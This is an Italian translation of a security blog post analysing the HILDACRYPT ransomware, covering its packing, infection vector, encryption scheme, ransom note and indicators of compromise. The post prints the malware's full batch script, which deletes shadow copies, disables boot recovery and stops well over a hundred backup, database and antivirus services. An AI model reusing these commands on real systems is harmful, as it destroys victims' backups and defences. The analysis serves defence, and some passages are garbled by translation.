Ciao, Habr! Ecco di nuovo noi a raccontarvi le ultime versioni di malware nella categoria Ransomware. HILDACRYPT è un nuovo ransomware, rappresentante della famiglia Hilda scoperta nell'agosto 2019, chiamata così in onore del cartone animato del servizio di streaming Netflix utilizzato per diffondere il malware. Oggi conosciamo le caratteristiche tecniche di questo virus ransomware aggiornato.

Nella prima versione dei ransomware Hilda, il link al trailer Il ransomware è contenuto in un file PE32 .NET, scritto per MS Windows. La sua dimensione è di 135 168 byte. Sia il codice sorgente principale che il codice del programma difensore sono scritti in C#. Secondo il timestamp di compilazione, il file binario è stato creato il 14 settembre 2019.
Analisi statica
Secondo Detect It Easy, il virus ransomware è stato compresso utilizzando Confuser e ConfuserEx, ma questi offuscatori sono uguali a prima, solo che ConfuserEx è il successore di Confuser, quindi le firme dei loro codici sono simili.

HILDACRYPT è effettivamente impacchettato con ConfuserEx.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Probabilmente, il ransomware è stato scovato su uno dei siti dedicati alla programmazione web, mascherandosi da legittimo programma XAMPP.
Vettore di attacco
L'intera catena di infezione può essere vista in
app.any.run sandbox .
Le stringhe del ransomware sono memorizzate in forma crittografata. Quando HILDACRYPT viene avviato, le decrittografa utilizzando Base64 e AES-256-CBC.
Innanzitutto, il ransomware crea nella cartella %AppDataRoaming% una cartella il cui parametro GUID (Globally Unique Identifier) è generato casualmente. Aggiungendo un file bat a questa posizione, il ransomware lo esegue tramite cmd.exe:

Installazione
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
Poi inizia a eseguire lo script batch per disabilitare funzioni o servizi di sistema.
![]()

Lo script contiene un lungo elenco di comandi che distruggono le copie shadow, disabilitano il server SQL, il backup e le soluzioni antivirus.

Lo script contiene un lungo elenco di comandi, tramite i quali vengono eliminate le copie shadow, disattivato il server SQL, eseguiti backup e soluzioni antivirus.
Ad esempio, sta cercando senza successo di fermare i servizi di backup Acronis Backup. Inoltre, attacca i sistemi di backup e le soluzioni antivirus dei seguenti fornitori: Veeam, Sophos, Kaspersky, McAfee e altri.
@echo off
:: Non sono veramente un fan dei pony, le ragazze dei cartoni animati sono migliori, non pensi?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Servizio di Controllo Dispositivi Sophos" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Servizio Zoolz 2" /y
net stop McTaskManager /y
net stop "Servizio Aggiornamento Automatico Sophos" /y
net stop "Servizio di Protezione del Sistema Sophos" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Ripristino di Sistema Symantec" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Servizio di Salute Sophos" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Router Messaggi Sophos" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Servizio di Pulizia Sophos" /y
net stop swi_update_64 /y
net stop "Servizio di Controllo Web Sophos" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Servizio Catalogo Backup Veeam" /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Client MCS Sophos" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "Servizio di Backup SQLsafe" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Servizio Safestore Sophos" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Servizio Scanner di File Sophos" /y
net stop "Agente Sophos" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Servizio Clienti Enterprise" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "Backup SQL" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Agente MCS Sophos" /y
net stop RESvc /y
net stop "Fornitore VSS Acronis" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "Servizio Filtro SQLsafe" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Dopo che i servizi e i processi menzionati sopra sono stati disattivati, il cryptolocker raccoglie informazioni su tutti i processi in esecuzione usando il comando tasklist, per assicurarsi che tutti i servizi necessari siano non operativi.
tasklist v /fo csv
Questo comando produce un elenco dettagliato dei processi in esecuzione, i cui elementi sono separati dal carattere «,».
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

Dopo questa verifica, il ransomware avvia il processo di crittografia.
Crittografia
Crittografia dei file
HILDACRYPT scandaglia tutto il contenuto trovato sui dischi rigidi, tranne le cartelle Recycle.Bin e Reference AssembliesMicrosoft. Quest'ultima contiene file dll, pdb e altri critici per le applicazioni .Net, che possono influenzare il funzionamento del ransomware. Per cercare i file che verranno crittografati, viene utilizzato il seguente elenco di estensioni:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Per crittografare i file dell'utente, il ransomware utilizza l'algoritmo AES-256-CBC. La dimensione della chiave è di 256 bit e la dimensione del vettore di inizializzazione (IV) è di 16 byte.

Nello screenshot successivo, i valori byte_2 e byte_1 sono stati ottenuti casualmente utilizzando GetBytes().

Chiave

ВИ

Il file crittografato ha l'estensione HCY!.. Questo è un esempio di file crittografato. Per questo file sono stati creati la chiave e l'IV menzionati sopra.

Crittografia delle chiavi
Il cryptolocker salva la chiave AES generata nel file crittografato. La prima parte del file crittografato ha un'intestazione che contiene dati come HILDACRYPT, KEY, IV, FileLen in formato XML e appare come segue:

La crittografia della chiave AES e dell'IV avviene tramite RSA-2048, mentre la codifica è effettuata con Base64. La chiave pubblica RSA è memorizzata nel corpo del cryptolocker in una delle stringhe crittografate in formato XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Per crittografare la chiave del file AES viene utilizzata la chiave pubblica RSA. La chiave pubblica RSA è codificata con Base64 e consiste in un modulo e in un'esponente pubblica di 65537. Per la decifratura è necessaria la chiave RSA privata, che è in possesso dell'attaccante.
Dopo la crittografia RSA, la chiave AES è codificata usando Base64, salvata nel file crittografato.
Messaggio di riscatto
Al termine della crittografia, HILDACRYPT scrive un file html nella cartella in cui ha crittografato i file. La notifica del ransomware contiene due indirizzi e-mail attraverso i quali la vittima può contattare l'attaccante.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net

La notifica del ransomware contiene anche la frase "No loli is safe;)" — "Nessuna loli è al sicuro;)", un riferimento a personaggi anime e manga con l'aspetto di ragazze piccole, vietati in Giappone.
Conclusione
HILDACRYPT, una nuova famiglia di ransomware, ha rilasciato una nuova versione. Il modello di crittografia non consente alla vittima di decifrare i file crittografati dal ransomware. Il cryptolocker utilizza metodi di protezione attiva per disabilitare i servizi di protezione relativi ai sistemi di backup e alle soluzioni antivirus. L'autore di HILDACRYPT è un fan della serie animata Hilda, mostrata su Netflix, il cui trailer era incluso nella lettera di riscatto della versione precedente del software.
Come al solito, e possono proteggere il tuo computer dal ransomware HILDACRYPT, e i fornitori hanno la possibilità di proteggere i propri clienti tramite . La protezione è garantita dal fatto che in queste soluzioni è inclusa non solo la copia di sicurezza, ma anche il nostro sistema integrato di protezione — una tecnologia potenziata da modelli di machine learning e basata su euristiche comportamentali, capace come nessun'altra di contrastare le minacce dei ransomware zero-day.
Indicatori di compromissione
Estensione del file HCY!
HILDACRYPTReadMe.html
xamp.exe con una lettera «p» e senza firma digitale
Probabilmente, il ransomware è stato scovato su uno dei siti dedicati alla programmazione web, mascherandosi da legittimo programma XAMPP.
Fonte: habr.com
